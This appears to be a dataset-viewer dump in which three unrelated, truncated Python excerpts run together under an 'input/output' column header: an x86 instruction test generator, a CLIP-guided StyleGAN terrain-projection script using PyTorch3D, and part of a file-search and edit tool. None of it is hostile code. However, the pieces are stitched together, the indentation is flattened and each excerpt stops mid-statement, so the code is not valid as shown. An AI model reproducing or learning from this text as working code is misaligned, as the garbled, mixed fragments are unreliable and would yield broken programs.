input
stringlengths
2.65k
237k
output
stringclasses
1 value
return True; ## @} def generateOneStdTestGregGreg(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult): """ Generate one standard instr greg,greg test. """ oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uInput,)); if iOp1X != iOp2X: oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],)); self.writeInstrGregGreg(cbEffOp, iOp1, iOp2, oGen); oGen.pushConst(uResult); oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1X, iOp2X if iOp1X != iOp2X else None),)); _ = cbMaxOp; return True; def generateOneStdTestGregGreg8BitHighPain(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput): """ High 8-bit registers are a real pain! """ assert oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) or oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2); # Figure out the register indexes of the max op sized regs involved. iOp1X = iOp1 & 3; iOp2X = iOp2 & 3; oGen.write(' ; iOp1=%u iOp1X=%u iOp2=%u iOp2X=%u\n' % (iOp1, iOp1X, iOp2, iOp2X,)); # Calculate unshifted result. if iOp1X != iOp2X: uCur = oGen.auRegValues[iOp1X]; if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1): uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8); else: uCur = uInput; if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) != oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2): if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1): uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8); else: uCur = rotateLeftUxx(cbMaxOp * 8, uCur, 8); uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen); # Rotate the input and/or result to match their max-op-sized registers. if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2): uInput = rotateLeftUxx(cbMaxOp * 8, uInput, 8); if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1): uResult = rotateLeftUxx(cbMaxOp * 8, uResult, 8); # Hand it over to an overridable worker method. 
return self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult); def generateOneStdTestGregMemNoSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iOp2, uInput, uResult): """ Generate mode 0, 1 and 2 test for the R/M=iOp2. """ if cAddrBits == 16: _ = cbMaxOp; else: iMod = 0; # No disp, except for i=5. oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput); self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, None, oGen); oGen.pushConst(uResult); oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),)); if iOp2 != 5 and iOp2 != 13: iMod = 1; for offDisp in oGen.getDispForMod(iMod): oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp); self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen); oGen.pushConst(uResult); oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),)); iMod = 2; for offDisp in oGen.getDispForMod(iMod): oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp); self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen); oGen.pushConst(uResult); oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),)); return True; def generateOneStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod, # pylint: disable=R0913 iBaseReg, iIndexReg, iScale, uInput, uResult): """ Generate one SIB variations. """ for offDisp in oGen.getDispForMod(iMod, cbEffOp): if ((iBaseReg == 5 or iBaseReg == 13) and iMod == 0): if iIndexReg == 4: if cAddrBits == 64: continue; # skipping. 
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); self.generateMemSetupReadByLabel(oGen, cbEffOp, uInput); self.writeInstrGregSibLabel(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen); sChecker = oGen.needGRegChecker(iOp1); else: oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); self.generateMemSetupReadByScaledReg(oGen, cAddrBits, cbEffOp, iIndexReg, iScale, uInput, offDisp); self.writeInstrGregSibScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen); sChecker = oGen.needGRegChecker(iOp1, iIndexReg); else: oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); if iIndexReg == 4: self.generateMemSetupReadByReg(oGen, cAddrBits, cbEffOp, iBaseReg, uInput, offDisp); self.writeInstrGregSibBase(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen); sChecker = oGen.needGRegChecker(iOp1, iBaseReg); else: if iIndexReg == iBaseReg and iScale == 1 and offDisp is not None and (offDisp & 1): if offDisp < 0: offDisp += 1; else: offDisp -= 1; self.generateMemSetupReadByBaseAndScaledReg(oGen, cAddrBits, cbEffOp, iBaseReg, iIndexReg, iScale, uInput, offDisp); self.writeInstrGregSibBaseAndScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen); sChecker = oGen.needGRegChecker(iOp1, iBaseReg, iIndexReg); oGen.pushConst(uResult); oGen.write(' call VBINSTST_NAME(%s)\n' % (sChecker,)); _ = cbMaxOp; return True; def generateStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, auInputs): """ Generate all SIB variations for the given iOp1 (reg) value. """ assert cAddrBits in [32, 64]; i = oGen.cSibBasePerRun; while i > 0: oGen.iSibBaseReg = (oGen.iSibBaseReg + 1) % oGen.oTarget.getGRegCount(cAddrBits / 8); if oGen.iSibBaseReg == X86_GREG_xSP: # no RSP testing atm. 
continue; j = oGen.getSibIndexPerRun(); while j > 0: oGen.iSibIndexReg = (oGen.iSibIndexReg + 1) % oGen.oTarget.getGRegCount(cAddrBits / 8); if oGen.iSibIndexReg == iOp1 and oGen.iSibIndexReg != 4 and cAddrBits != cbMaxOp: continue; # Don't know the high bit of the address ending up the result - skip it for now. for iMod in [0, 1, 2]: if oGen.iSibBaseReg == iOp1 \ and ((oGen.iSibBaseReg != 5 and oGen.iSibBaseReg != 13) or iMod != 0) \ and cAddrBits != cbMaxOp: continue; # Don't know the high bit of the address ending up the result - skip it for now. for _ in oGen.oSibScaleRange: oGen.iSibScale *= 2; if oGen.iSibScale > 8: oGen.iSibScale = 1; for uInput in auInputs: oGen.newSubTest(); uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[iOp1], oGen); self.generateOneStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod, oGen.iSibBaseReg, oGen.iSibIndexReg, oGen.iSibScale, uInput, uResult); j -= 1; i -= 1; return True; def generateStandardTests(self, oGen): """ Generate standard tests. """ # Parameters. cbDefOp = oGen.oTarget.getDefOpBytes(); cbMaxOp = oGen.oTarget.getMaxOpBytes(); auShortInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen); auLongInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen, fLong = True); iLongOp1 = oGen.oTarget.randGRegNoSp(); iLongOp2 = oGen.oTarget.randGRegNoSp(); # Register tests if self.fTestRegForm: for cbEffOp in self.acbOpVars: if cbEffOp > cbMaxOp: continue; oOp2Range = range(oGen.oTarget.getGRegCount(cbEffOp)); if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny: oOp2Range = [iLongOp2,]; oGen.write('; cbEffOp=%u\n' % (cbEffOp,)); for iOp1 in range(oGen.oTarget.getGRegCount(cbEffOp)): if iOp1 == X86_GREG_xSP: continue; # Cannot test xSP atm. for iOp2 in oOp2Range: if (iOp2 >= 16 and iOp1 in range(4, 16)) \ or (iOp1 >= 16 and iOp2 in range(4, 16)): continue; # Any REX encoding turns AH,CH,DH,BH regs into SPL,BPL,SIL,DIL. if iOp2 == X86_GREG_xSP: continue; # Cannot test xSP atm. 
oGen.write('; iOp2=%u cbEffOp=%u\n' % (iOp2, cbEffOp)); for uInput in (auLongInputs if iOp1 == iLongOp1 and iOp2 == iLongOp2 else auShortInputs): oGen.newSubTest(); if not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) and not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2): uCur = oGen.auRegValues[iOp1 & 15] if iOp1 != iOp2 else uInput; uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen); self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1 & 15, iOp2, iOp2 & 15, uInput, uResult); else: self.generateOneStdTestGregGreg8BitHighPain(oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput); # Memory test. if self.fTestMemForm: for cAddrBits in oGen.oTarget.getAddrModes(): for cbEffOp in self.acbOpVars: if cbEffOp > cbMaxOp: continue; for _ in oGen.getModRegRange(cbEffOp): oGen.iModReg = (oGen.iModReg + 1) % oGen.oTarget.getGRegCount(cbEffOp); if oGen.iModReg == X86_GREG_xSP: continue; # Cannot test xSP atm. if oGen.iModReg > 15: continue; ## TODO AH,CH,DH,BH auInputs = auLongInputs if oGen.iModReg == iLongOp1 else auShortInputs; for _ in oGen.oModRmRange: oGen.iModRm = (oGen.iModRm + 1) % oGen.oTarget.getGRegCount(cAddrBits * 8); if oGen.iModRm != 4 or cAddrBits == 16: for uInput in auInputs: oGen.newSubTest(); if oGen.iModReg == oGen.iModRm and oGen.iModRm != 5 \ and oGen.iModRm != 13 and cbEffOp != cbMaxOp: continue; # Don't know the high bit of the address ending up the result - skip it for now. uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[oGen.iModReg & 15], oGen); self.generateOneStdTestGregMemNoSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, oGen.iModRm, uInput, uResult); else: # SIB - currently only short list of inputs or things may get seriously out of hand. 
self.generateStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, auShortInputs); return True; def generateTest(self, oGen, sTestFnName): oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,)); self.generateStandardTests(oGen); oGen.write(' ret\n'); oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,)); return True; class InstrTest_Mov_Gv_Ev(InstrTest_MemOrGreg_2_Greg): """ Tests MOV Gv,Ev. """ def __init__(self): InstrTest_MemOrGreg_2_Greg.__init__(self, 'mov Gv,Ev', self.calc_mov); @staticmethod def calc_mov(cbEffOp, uInput, uCur, oGen): """ Calculates the result of a mov instruction.""" if cbEffOp == 8: return uInput & UINT64_MAX; if cbEffOp == 4: return uInput & UINT32_MAX; if cbEffOp == 2: return (uCur & 0xffffffffffff0000) | (uInput & UINT16_MAX); assert cbEffOp == 1; _ = oGen; return (uCur & 0xffffffffffffff00) | (uInput & UINT8_MAX); class InstrTest_MovSxD_Gv_Ev(InstrTest_MemOrGreg_2_Greg): """ Tests MOVSXD Gv,Ev. """ def __init__(self): InstrTest_MemOrGreg_2_Greg.__init__(self, 'movsxd Gv,Ev', self.calc_movsxd, acbOpVars = [ 8, 4, 2, ]); self.fTestMemForm = False; # drop this... def writeInstrGregGreg(self, cbEffOp, iOp1, iOp2, oGen): """ Writes the instruction with two general registers as operands. """ if cbEffOp == 8: oGen.write(' movsxd %s, %s\n' % ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp / 2),)); else: oGen.write(' oddmovsxd %s, %s\n' % ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp),)); return True; def isApplicable(self, oGen): return oGen.oTarget.is64Bit(); @staticmethod def calc_movsxd(cbEffOp, uInput, uCur, oGen): """ Calculates the result of a movxsd instruction. Returns the result value (cbMaxOp sized). """ _ = oGen; if cbEffOp == 8 and (uInput & RT_BIT_32(31)): return (UINT32_MAX << 32) | (uInput & UINT32_MAX); if cbEffOp == 2: return (uCur
<reponame>igg002/stylegan2-ada-pytorch<gh_stars>0 # Experimental Version # # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. # # NVIDIA CORPORATION and its licensors retain all intellectual property # and proprietary rights in and to this software, related documentation # and any modifications thereto. Any use, reproduction, disclosure or # distribution of this software and related documentation without an express # license agreement from NVIDIA CORPORATION is strictly prohibited. import copy import os from time import perf_counter import click import imageio import torch import torch.nn.functional as F import numpy as np import PIL.Image import clip import dnnlib import legacy from pytorch3d.io import load_obj from pytorch3d.structures import Meshes from pytorch3d.renderer import ( look_at_view_transform, FoVPerspectiveCameras, DirectionalLights, Materials, RasterizationSettings, MeshRenderer, MeshRasterizer, SoftPhongShader, TexturesUV, ) image_mean = torch.tensor([0.48145466, 0.4578275, 0.40821073]).cuda() image_std = torch.tensor([0.26862954, 0.26130258, 0.27577711]).cuda() def spherical_dist_loss(x: torch.Tensor, y: torch.Tensor): ''' Original code by <NAME>, copied from https://github.com/afiaka87/clip-guided-diffusion/blob/main/cgd/losses.py ''' x = F.normalize(x, dim=-1) y = F.normalize(y, dim=-1) return (x - y).norm(dim=-1).div(2).arcsin().pow(2).mul(2) #---------------------------------------------------------------------------- def project( G, target_image: torch.Tensor, # [C,H,W] and dynamic range [0,255], W & H must match G output resolution target_text, *, num_steps = 512, w_avg_samples = 8192, initial_learning_rate = 0.1, initial_latent = None, initial_noise_factor = 0.01, lr_rampdown_length = 0.25, lr_rampup_length = 0.5, noise_ramp_length = 0.5, max_noise = 0.5, regularize_noise_weight = 0.0, verbose = False, use_w_only = False, use_cosine_dist = True, use_spherical_dist = False, is_16_bit = False, device: torch.device ): if 
target_image is not None: assert target_image.shape[1:] == (G.img_resolution, G.img_resolution) assert use_cosine_dist or use_spherical_dist def logprint(*args): if verbose: print(*args) G = copy.deepcopy(G).eval().requires_grad_(False).to(device) # type: ignore # Compute w stats. logprint(f'Computing W midpoint and stddev using {w_avg_samples} samples...') z_samples = np.random.randn(w_avg_samples, G.z_dim) labels = None if (G.mapping.c_dim): labels = torch.from_numpy(0.5*np.random.randn(w_avg_samples, G.mapping.c_dim)).to(device) w_samples = G.mapping(torch.from_numpy(z_samples).to(device), labels) # [N, L, C] w_samples = w_samples.cpu().numpy().astype(np.float32) # [N, L, C] w_samples_1d = w_samples[:, :1, :].astype(np.float32) w_avg = np.mean(w_samples, axis=0, keepdims=True) # [1, L, C] w_std = (np.sum((w_samples - w_avg) ** 2) / w_avg_samples) ** 0.5 std_dev = np.std(w_samples) if initial_latent is not None: w_avg = initial_latent if w_avg.shape[1] == 1 and not use_w_only: w_avg = np.tile(w_avg, (1, G.mapping.num_ws, 1)) # Setup noise inputs. noise_bufs = { name: buf for (name, buf) in G.synthesis.named_buffers() if 'noise_const' in name } # Load CLIP model, transform = clip.load("ViT-B/16", device=device) # Features for target image. if target_image is not None: target_images = target_image.unsqueeze(0).to(device).to(torch.float32) if target_images.shape[2] > 224: target_images = F.interpolate(target_images, size=(224, 224), mode='area') # target_images = F.interpolate(target_images, size=(256, 256), mode='area') # target_images = target_images[:, :, 16:240, 16:240] # 256 -> 224, center crop with torch.no_grad(): clip_target_features = model.encode_image(((target_images / 255.0) - image_mean[None, :, None, None]) / image_std[None, :, None, None]).float() # Set render properties. batch_size = 8 dist = 2.5 raster_image_size = 224 sigma = 0 # 1e-7 faces_per_pixel = 20 # Initialize cameras. 
elev = torch.linspace(30, 150, batch_size) azim = torch.linspace(-180, 180, batch_size) R, T = look_at_view_transform(dist=dist, elev=elev, azim=azim) cameras = FoVPerspectiveCameras(device=device, R=R, T=T, fov=60.0, znear=0.1) # Initialize lights. lights = DirectionalLights(device=device) # Initialize materials. materials = Materials( device=device, shininess=1.0 ) # Initialize raster settings. raster_settings = RasterizationSettings( image_size=raster_image_size, blur_radius=np.log(1. / 1e-4 - 1.) * sigma, faces_per_pixel=faces_per_pixel, ) # Define renderer. renderer = MeshRenderer( rasterizer=MeshRasterizer( cameras=cameras, raster_settings=raster_settings ), shader=SoftPhongShader( device=device, cameras=cameras, lights=lights ) ) # Load base model. grid_path = 'grid.obj' # TEMP verts, faces, aux = load_obj(grid_path) verts_uvs = aux.verts_uvs[None, ...].to(device) # (1, V, 2) faces_uvs = faces.textures_idx[None, ...].to(device) # (1, F, 3) texture_image = torch.full([1, 513, 513, 3], 1.0, device=device) base_mesh = Meshes(verts=[verts], faces=[faces.verts_idx]).to(device) base_mesh.textures = TexturesUV(verts_uvs=verts_uvs, faces_uvs=faces_uvs, maps=texture_image) height_multiplier_initial = 0.5 height_multiplier = torch.tensor(height_multiplier_initial, requires_grad=True, device=device) render_frames = [] if use_w_only: w_avg = np.mean(w_avg, axis=1, keepdims=True) w_opt = torch.tensor(w_avg, dtype=torch.float32, device=device, requires_grad=True) # pylint: disable=not-callable w_out = torch.zeros([num_steps] + list(w_opt.shape[1:]), dtype=torch.float32, device=device) optimizer = torch.optim.Adam([w_opt, height_multiplier] + list(noise_bufs.values()), betas=(0.9, 0.999), lr=initial_learning_rate) # optimizer = madgrad.MADGRAD([w_opt] + list(noise_bufs.values()), lr=initial_learning_rate) # optimizer = SM3.SM3([w_opt] + list(noise_bufs.values()), lr=initial_learning_rate) # Init noise. 
for buf in noise_bufs.values(): buf[:] = torch.randn_like(buf) buf.requires_grad = True for step in range(num_steps): # Learning rate schedule. t = step / num_steps w_noise_scale = max_noise * w_std * initial_noise_factor * max(0.0, 1.0 - t / noise_ramp_length) ** 2 lr_ramp = min(1.0, (1.0 - t) / lr_rampdown_length) lr_ramp = 0.5 - 0.5 * np.cos(lr_ramp * np.pi) lr_ramp = lr_ramp * min(1.0, t / lr_rampup_length) lr = initial_learning_rate * lr_ramp for param_group in optimizer.param_groups: param_group['lr'] = lr # Synth images from opt_w. w_noise = torch.randn_like(w_opt) * w_noise_scale ws = w_opt + w_noise if use_w_only: ws = ws.repeat([1, G.mapping.num_ws, 1]) G_outputs = G.synthesis(ws, noise_mode='const') # Create a terrain mesh with the generated heightmap applied to. offset = (G_outputs + 1) / 2 offset = F.interpolate(offset, (513, 513), mode='area') * height_multiplier offset = offset.permute(0, 2, 3, 1)[0].flatten().unsqueeze(-1) offset = F.pad(input=offset, pad=(0, 2), mode='constant', value=0) offset = offset[:, [1, 0, 2]] mesh = base_mesh.offset_verts(offset) mesh = mesh.extend(batch_size) # Render the terrain mesh. 
rendered = renderer(mesh, materials=materials) synth_images = rendered[:, :, :, :3].permute(0, 3, 1, 2) render_frames.append(rendered) # TEMP synth_images = (synth_images - image_mean[None, :, None, None]) / image_std[None, :, None, None] dist = 0 cosine_sim_loss_image, cosine_sim_loss_text = 0, 0 spherical_loss_image, spherical_loss_text = 0, 0 # adj_center = 2.0 if target_image is not None: # Cosine Similarity if use_cosine_dist: generated_encoded = model.encode_image(synth_images).float() cosine_sim = torch.cosine_similarity(clip_target_features, generated_encoded, dim=-1).mean() # cosine_sim_loss_image = 1 - cosine_sim cosine_sim_loss_image = -1 * cosine_sim dist += cosine_sim_loss_image # Spherical Distance if use_spherical_dist: generated_encoded = model.encode_image(synth_images).float() spherical_loss_image = spherical_dist_loss(generated_encoded.unsqueeze(0), clip_target_features.unsqueeze(0)).sum() dist += spherical_loss_image # # Original # clip_dist = (clip_target_features - model.encode_image(synth_images).float()).square().sum() # dist += F.relu(0.5 + adj_center * clip_dist - min_threshold) if target_text is not None: # Cosine Similarity if use_cosine_dist: cosine_sim = (model(synth_images, target_text)[0] / 100).sum() # cosine_sim = torch.cosine_similarity(model.encode_text(target_text).float(), model.encode_image(synth_images).float(), dim=-1).mean() # cosine_sim_loss_text = 1 - cosine_sim cosine_sim_loss_text = -1 * cosine_sim dist += cosine_sim_loss_text # Spherical Distance if use_spherical_dist: generated_encoded = model.encode_image(synth_images).float() txt_encoded = model.encode_text(target_text).float() spherical_loss_text = spherical_dist_loss(generated_encoded.unsqueeze(0), txt_encoded.unsqueeze(0)).sum() dist += spherical_loss_text # # Original # clip_text = 1 - model(clip_synth_image, target_text)[0].sum() / 100 # dist += 2 * F.relu(adj_center * clip_text * clip_text - min_threshold / adj_center) # Noise regularization. 
reg_loss = 0.0 for v in noise_bufs.values(): noise = v[None,None,:,:] # must be [1,1,H,W] for F.avg_pool2d() while True: reg_loss += (noise*torch.roll(noise, shifts=1, dims=3)).mean()**2 reg_loss += (noise*torch.roll(noise, shifts=1, dims=2)).mean()**2 if noise.shape[2] <= 8: break noise = F.avg_pool2d(noise, kernel_size=2) loss = dist + reg_loss * regularize_noise_weight # Step optimizer.zero_grad(set_to_none=True) loss.backward() optimizer.step() logprint(f'step {step+1:>4d}/{num_steps}: loss {float(loss):<5.2f} dist {dist:<4.2f} c_loss_text {cosine_sim_loss_text:<4.2f} s_loss_text {spherical_loss_text:<4.2f} reg_loss {reg_loss * regularize_noise_weight:<4.2f} height_multiplier {height_multiplier:<4.2f}') # Save projected W for each optimization step. w_out[step] = w_opt.detach()[0] # Normalize noise. with torch.no_grad(): for buf in noise_bufs.values(): buf -= buf.mean() buf *= buf.square().mean().rsqrt() return w_out, render_frames #---------------------------------------------------------------------------- @click.command() @click.option('--network', 'network_pkl', help='Network pickle filename', required=True) @click.option('--target-image', 'target_fname', help='Target image file to project to', required=False, metavar='FILE', default=None) @click.option('--target-text', help='Target text to project to', required=False, default=None) @click.option('--initial-latent', help='Initial latent', default=None) @click.option('--lr', help='Learning rate', type=float, default=0.3, show_default=True) @click.option('--num-steps', help='Number of optimization steps', type=int, default=300, show_default=True) @click.option('--seed', help='Random seed', type=int, default=303, show_default=True) @click.option('--save-video', help='Save an mp4 video of optimization progress', type=bool, default=True, show_default=True) @click.option('--outdir', help='Where to save the output images', required=True, metavar='DIR') @click.option('--use-cosine-dist', help='Use cosine distance 
when calculating the loss', type=bool, default=True, show_default=True) @click.option('--use-spherical-dist', help='Use spherical distance when calculating the loss', type=bool, default=False, show_default=True) @click.option('--16bit', 'is_16_bit', help='Set to true if the network is trained to output 16-bit images', type=bool, default=False, show_default=True) @click.option('--use-w-only', help='Project into w space instead of w+ space', type=bool, default=False, show_default=True) def run_projection( network_pkl: str, target_fname: str, target_text: str, initial_latent: str, lr: float, num_steps: int, seed: int, save_video: bool, outdir: str, use_cosine_dist: bool, use_spherical_dist: bool, is_16_bit: bool, use_w_only: bool, ): """Project given image to the latent space of pretrained network pickle using CLIP. Examples: \b python clip_search.py --outdir=out --target-text='An image of an apple.' \\ --network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/ffhq.pkl """ # Set seed value np.random.seed(seed) torch.manual_seed(seed) # Load networks. print(f'Loading networks from {network_pkl}...') device = torch.device('cuda') with dnnlib.util.open_url(network_pkl) as fp: G = legacy.load_network_pkl(fp)['G_ema'].requires_grad_(False).to(device) # type: ignore # Load target image. target_image = None if target_fname: target_pil = PIL.Image.open(target_fname).convert('RGB').filter(PIL.ImageFilter.SHARPEN) w, h = target_pil.size s = min(w, h) target_pil = target_pil.crop(((w - s) // 2, (h - s) // 2, (w + s) // 2, (h + s) // 2)) target_pil
ask_permission: bool, default True. If True, gives an interactive prompt so that the user can manually choose which changes in the resultset should be made. overwrite: bool, default True. If False, create a new file rather than overwriting the original. If the last FileReader in this GorpHandler was looking at (file|dir)names, this will rename all the files and directories in the resultset, pending user input. Otherwise, this will apply replacement_func to all the locations in those files that were found by the query.""" from .jsonpath import JsonPathError, compressed_obj_repr def mutate_file(obj, path, func, ask_permission=False, **kwargs): """Mutates a nested iterable object in-place by applying func to obj[path]. obj: an object containing arbitrarily nested iterables. path: a tuple of keys or indices to follow through the object. func: a function to apply to the child found at the end of the path. ask_permission: if True, ask before changing the node. Useful when this is called repeatedly by other functions. Returns: None.""" level = kwargs.get("level", 0) if level == len(path): if not hasattr(func, "__call__"): out = func else: out = func(obj) if ask_permission: print( "At path {p},\n{obj_short}\n would be replaced by\n{out_short}.".format( p=path, obj_short=compressed_obj_repr(obj), out_short=compressed_obj_repr(out), ) ) decision = input("Do you want to do this? (y/n) ") if decision == "y": return out else: next_decision = input( "Do you want to stop editing this file? (y/n) " ) if next_decision == "y": raise JsonPathError("mutate_file halted at user request.") return obj return out obj[path[level]] = mutate_file( obj[path[level]], path, func, ask_permission, level=level + 1 ) if level != 0: return obj def mutate_file_repeatedly(obj, paths, func, ask_permission=False): """See mutate_file. 
This applies the func to obj[path] for each path in paths (by which we mean line numbers, or (page, line) tuples, or json paths).""" for ii, p in enumerate(paths): if not is_iterable(p): p = (p,) try: mutate_file(obj, p, func, ask_permission) except Exception as ex: if "halted at user request" in repr(ex): return False raise JsonPathError(ex) if ask_permission and ii < len(paths) - 1: ask_permission = ( input( "There are {numpaths} locations in this file that may be changed. Do you still want to be asked permission? (y/n) ".format( numpaths=len(paths) - ii - 1 ) ) == "y" ) return True for ii, (fname, paths) in enumerate(self.resultset.items()): if {"f", "a", "d"} & self.options[-1]: # these all look at (file|dir)names only, so the -u option with one of # these options should only change the (file|dir)name. new_fname = replacement_func(fname) decision = "n" if ask_permission: decision = input( (f"{fname} will be renamed to {new_fname}." " Is that OK?\n") ) if (not ask_permission) or (decision == "y"): try: os.rename(fname, new_fname) except Exception as ex: raise ex pass else: use_yaml = "y" in self.options[-1] if use_yaml: try: import yaml except: warn_first_import_error("yaml") use_yaml = False # process the text in fname in some appropriate way if ask_permission: print(f"Now editing {fname}.") with open(fname) as f: if "j" in self.options[-1]: processed_text = json.load(f) elif use_yaml: processed_text = list(yaml.safe_load_all(f)) is_single_doc = False if len(processed_text) == 1: processed_text = processed_text[0] is_single_doc = True else: processed_text = re.split("\r?\n", f.read()) edit_file = mutate_file_repeatedly( obj=processed_text, paths=paths, func=replacement_func, ask_permission=ask_permission, ) if edit_file: if overwrite: write_to_name = fname else: write_to_name = increment_name(fname) with open(write_to_name, "w") as f: if "j" in self.options[-1]: json.dump(processed_text, f) elif use_yaml: if is_single_doc: yaml.safe_dump(processed_text, f) 
else: yaml.safe_dump_all(processed_text, f) else: f.write("\n".join(processed_text)) if ask_permission and ii < len(self.resultset) - 1: ask_permission = ( input( f"There are {len(self.resultset)-ii-1} files remaining that may be edited. Do you still want to be asked permission? (y/n) " ) == "y" ) if ask_permission: quit_decision = input("Do you want to stop editing files? (y/n) ") if quit_decision == "y": return def generateFileSet(fname: str, d=False, r=False): """fname: the name of a file or directory. d: Boolean. If true, only yield directories. r: Boolean. If true, recursively search subdirectories of fname for files. Returns: a generator that yields names of directories or files, as per d and r. """ fname = os.path.abspath(fname) if os.path.isfile(fname): yield fname else: if r: if d: for root, dirs, files in os.walk(fname): root = os.path.relpath(root, fname) if root == ".": root = "" GorpLogger.info(f"in generateFileSet (r and d), root = {root}") for Dir in dirs: yield os.path.join(root, Dir) else: for root, dirs, files in os.walk(fname): root = os.path.relpath(root, fname) if root == ".": root = "" GorpLogger.info(f"in generateFileSet (r and not d), root = {root}") for file in files: yield os.path.join(root, file) else: for file in os.listdir(fname): GorpLogger.info(f"in generateFileSet (not r), file = {file}") if d and not os.path.isdir(os.path.join(fname, file)): continue yield file class FileReader: """Handles a single subquery, filtering a set of files based on filenames or text matching a regex. These should only be created by a GorpHandler. *options*: a tuple of options. *regex*: a string (regex, gorp.jsonpath query, XPath, or CSS selector) *files*: a list of files or filename. 
*handler*: the GorpHandler that spawned it.""" def __init__(self, options, regex, files, handler: GorpHandler): # bad_text_files.add("rerjeu.2py") self.handler = handler self.options = options self.regex = regex self.a = "a" in self.options self.b = "b" in self.options # read raw bytes of any file if self.b: regex = regex.encode() self.regex = regex self.docx = ("docx" in self.options) and (not import_warnings["docx"][0]) self.pdf = ("pdf" in self.options) and (not import_warnings["pdfminer"][0]) self.xl = ("xl" in self.options) and (not import_warnings["openpyxl"][0]) self.c = "c" in self.options self.d = "d" in self.options self.e = "e" in self.options self.f = "f" in self.options self.g = "g" in self.options self.h = "h" in self.options self.i = "i" in self.options self.j = "j" in self.options # self.k = ('k' in self.options) # a post-processing option used on the final resultset self.l = "l" in self.options self.m = [x for x in self.options if x[0] == "m" and x != "mv"] if self.m: m = self.m[0] try: comparator, modtime = re.findall("([<>=]=?)(.+)", m)[0] compare_func = {**binops, "=": binops["=="]}[comparator] self.modtime_filter = lambda x: compare_func(str(x), modtime) except: self.modtime_filter = lambda x: True self.n = "n" in self.options self.o = "o" in self.options # self.p = ('p' in self.options) # see self.k comment # self.q = ('q' in self.options) self.r = "r" in self.options self.s = [x for x in self.options if x[0] == "s" and x != "sed"] if self.s: s = self.s[0] try: comparator, size = re.findall("([<>=]=?)(.+)", s)[0] size = byteform_to_num(size) compare_func = {**binops, "=": binops["=="]}[comparator] self.size_filter = lambda x: compare_func(x, size) except: self.size_filter = lambda x: True # self.t = ('t' in self.options) # see self.k self.tab = "tab" in self.options # self.u = ('u' in self.options) # see self.k self.v = "v" in self.options self.w = "w" in self.options self.x = ("x" in self.options) and not import_warnings["lxml"][0] self.y = 
